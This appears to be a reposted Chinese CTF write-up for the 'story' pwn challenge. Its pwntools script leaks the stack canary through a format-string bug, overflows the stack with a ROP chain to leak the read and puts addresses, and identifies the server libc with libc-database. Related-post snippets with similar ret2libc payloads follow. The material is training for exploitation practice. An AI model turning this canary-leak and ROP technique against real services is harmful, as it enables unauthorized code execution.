story 泄露服务器libc版本

最新推荐文章于 2022-11-28 17:31:30 发布
转载 最新推荐文章于 2022-11-28 17:31:30 发布 · 128 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/snip3r/p/10675538.html

本文介绍了一种利用信息泄露获取服务器Libc版本的方法,通过泄露脚本得到两个函数偏移,再使用libc-database确定Libc版本,最后构造ROP完成攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

记录下学到的姿势,利用信息泄露得到服务器libc 至少两个函数偏移,利用libc-databse得到服务器libc版本

传送门

泄露脚本如下

from pwn import *

context.log_level='DEBUG'

r=remote('ctf2.linkedbyx.com',10755)
#r=process('./story')
elf=ELF('./story')

'''
rop_chain=
payload='a'*0x90+canary+'b'*8+rop_chain
r.sendlineafter('Tell me the size of your story:',payload)
'''

'''
0x0000000000400bd3 : pop rdi ; ret
'''

main=0x0000000000400876

r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(18),16)
success('canary:'+hex(canary))

payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','1024')
r.sendlineafter(':',payload)
read=r.recv(12)
print read
#success('read:'+hex(read))

#r.interactive()

r.sendlineafter('Please Tell Your ID:','%15$p')
r.recvuntil('Hello ')
canary=int(r.recv(18),16)
success('canary:'+hex(canary))

payload='a'*0x88+p64(canary)+'b'*8+p64(0x0000000000400bd3)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)
r.sendlineafter(':','1024')
r.sendlineafter(':',payload)
puts=r.recv(12)
print puts

r.interactive()

之后./find read 250 puts 690即可泄露服务器libc

root@snip3r:~/libc-database# ./find read 250 puts 690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)

有了libc直接构造ROP即可

转载于:https://www.cnblogs.com/snip3r/p/10675538.html

适合新手的ret2libc3之路
Vicl1fe的博客
05-29 4097
rop之libc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
pwn栈溢出之dltest(DynELF和libcSearcher利用)
weixin_44113469的博客
02-15 1311
栈溢出dltest解题步骤 思路分析:观察源码,是个栈溢出。没有system函数,也没有给libc库,但有read函数和write函数。可以借助DynELF泄露函数地址,定为system地址,然后借助read函数写入“/bin/sh”,并调用执行system(“/bin/sh”) 0x01 ...
[PWN] BUUCTF pwn2_sctf_2016(整数溢出+泄露libc)
空城惜梦的博客
06-05 953
[PWN] BUUCTF pwn2_sctf_2016解题分析漏洞利用payload分析payload1payload2 解题分析 按照惯例先checksec,开了nx保护和部分RELRO 接着运行文件,观察程序的运行逻辑,读入一个长度len然后把输入的字符,再打印输入的Len个字符 32位IDA打开文件,main函数调用了vuln() 发现对输入的长度len做出了限制,len不能大于32 当len>32后,程序将结束,这就导致无法直接溢出 进入get_n函数,发现get_n会接收a2个长度
[BUUCTF-pwn] gxyctf_2019_blind_note
weixin_52640415的博客
01-19 360
盲打
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 783
pwn 64位 泄露libc版本
[pwn]ROP:信息泄露获取libc版本和地址
Breeze的博客
08-26 1万+
文章目录通过信息泄露获取libc版本和地址DynELF模块介绍pwn200 writeuppwn100 writeup 通过信息泄露获取libc版本和地址 有一些pwn题目中我们可以找到很明显的溢出,但程序中并没有system函数,也没有给出libc版本。但我们可以通过反复的溢出打印一些内存的值来在内存中搜索system的地址,这里主要使用的工具是pwntools中的D以内ELF模块。 DynEL...
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7474
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
2021-10-11 Pwn练习记录
m0_56897090的博客
10-11 574
文章目录easy题目分析EXP重做note2分析EXP重做[ZJCTF_2019]Easyheap分析EXP重做actf_2019_babystack分析EXP重做gyctf_2020_borrowstack分析EXP重做ciscn_2019_en_3分析EXP重做bjdctf_2020_YDSneedGrirlfrien分析EXP重做gyctf_2020_some_thing_interesting分析EXP重做ACTF_2019_babyheap分析EXP重做Wustctf2020_easyfast分析
通过给的libc泄露函数地址
zszcr的博客
03-22 5600
libc中的函数相对于libc的基地址的偏移都是确定的,如果有一道题给你了libc的文件,就可以通过libc文件泄露出system函数和binsh的地址,然后再构造payload。一般通过write()函数泄露 ,通过ELF获得write函数在got表和plt表中的地址同时获得程序start地址 构造payload payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+  p3...
利用puts函数泄露libc内存信息
zszcr的博客
03-22 3287
puts函数puts的原型是puts(addr),即将addr作为起始地址输出字符串,直到遇到“x00”字符为止。也就是说,puts函数输出的数据长度是不受控的,只要我们输出的信息中包含x00截断符,输出就会终止,且会自动将“n”追加到输出字符串的末尾,这是puts函数的缺点,而优点就是需要的参数少,只有1个,无论在x86还是x64环境下,都容易调用。为了克服输入不受控这一缺点,我们考虑利用put...
泄漏libc获取shell的模板
九层台
05-15 3065
这里用一个例子来讲解文件名叫ret2libc3可以自行下载。 这里只开启了NX保护,但是这才典型。下面讲述一下正常pwn的思路。 代码很简单,漏洞也很清楚,栈溢出。 int __cdecl main(int argc, const char **argv, const char **envp) { char s; // [esp+1Ch] [ebp-64h] setvbuf...
泄露libc
inquisiter
01-12 1643
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如"%n"和"%12$p"这种利用方式。 考虑到main函数由libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
CTF中的PWN——绕NX防护2(泄露libc + 栈溢出)
壊壊的诱惑你的博客
10-23 1972
前言: 继续PWN的学习,今天整理一下绕过NX,同时libc本地不存在需要通过相应函数泄露地址的方式进行进行溢出。 本题工具介绍: LibcSearcher 一个基于libc_database写的python库,可以通过泄露的函数实际地址查找对应的libc版本。 from LibcSearcher import * #第二个参数,为已泄露的实际地址,或最后12...
Linux查看glibc版本信息
热门推荐
xiaoxinyu316的专栏
04-02 7万+
1  centos(以centos 6.0为例): (1) 可通过rpm -qa | grep glibc查看系统目前安装了哪些和glibc有关的包: [root@Cluster ~]# rpm -qa | grep glibc glibc-2.12-1.47.el6_2.12.i686 glibc-headers-2.12-1.47.el6_2.12.x86_64 gl
(攻防世界)(pwn)welpwn
PLpa的博客
07-18 2794
首先,放在最前面:这题服务器远端的libc版本libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
(pwn) C语言 write函数且使用write函数泄露 libc版本
半岛铁盒的博客
08-16 4252
ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil("What is your name?") r.send(payload) ...
pwn1
u014281987的博客
08-27 1019
坑:记住是/bin/sh,不是bin/sh啊啊啊 这道题的思路是先通过溢出使得游戏流程能够执行到到finger,首先劫持ret puts出(puts_addr+next_func_addr+argu)puts got plt表,再在对方服务器libc的帮助下,算出system puts偏移获得system实际地址,再如puts进行shell调用 from pwn import * io=
Ubuntu安装LibcSearcher|泄露已知libc版本libc地址工具
Kni9hT's Blog
03-20 3943
文章目录0x00.安装方法0x01.使用方法 LibcSearcher是python的一个库,在做pwn题的时候通常会用到,作用是泄露已知libc版本libc地址。 0x00.安装方法 1. git clone https://github.com/lieanu/LibcSearcher.git 2. cd LibcSearcher 3. sudo python setup.py in...
WF6.0Datasheet-2010-4-8.pdf
最新发布
08-06
WF6.0Datasheet-2010-4-8.pdf
Redis网络演示项目libc版本更新解析
项目可能包含演示如何使用C语言进行Redis数据库操作的代码,例如,如何连接Redis服务器、执行数据的读写、以及网络通信方面可能涉及的底层细节。项目文件可能被封装在以日期为版本标记的压缩包中,方便版本管理和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值